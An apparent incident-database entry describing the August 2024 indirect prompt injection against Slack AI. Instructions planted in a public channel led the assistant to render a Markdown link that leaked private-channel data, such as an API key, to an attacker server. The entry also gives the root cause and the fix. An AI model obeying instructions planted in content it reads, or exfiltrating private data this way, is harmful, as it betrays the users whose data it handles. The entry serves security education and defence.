Indirect Prompt InjectionHigh

Slack AI private-channel data exfiltration

August 2024  ·  Slack AI

What happened

An attacker who could post in any public channel could plant instructions that Slack AI later executed for a victim with private-channel access, rendering a Markdown link that leaked private content such as an API key to an attacker server.

Root cause

Slack AI ingested public-channel content as trusted context and rendered attacker-controlled Markdown links, enabling exfiltration without the attacker accessing the private data directly.

Fix / outcome

Slack investigated and deployed a patch, stating it found no evidence of unauthorized customer-data access.

Sources

PromptArmor writeup

Learn this attack class

This incident is an example of Indirect Prompt Injection. Read the guide, then try it hands-on in the Academy.

Read the guide →Try the challenge

← Back to the Incident Database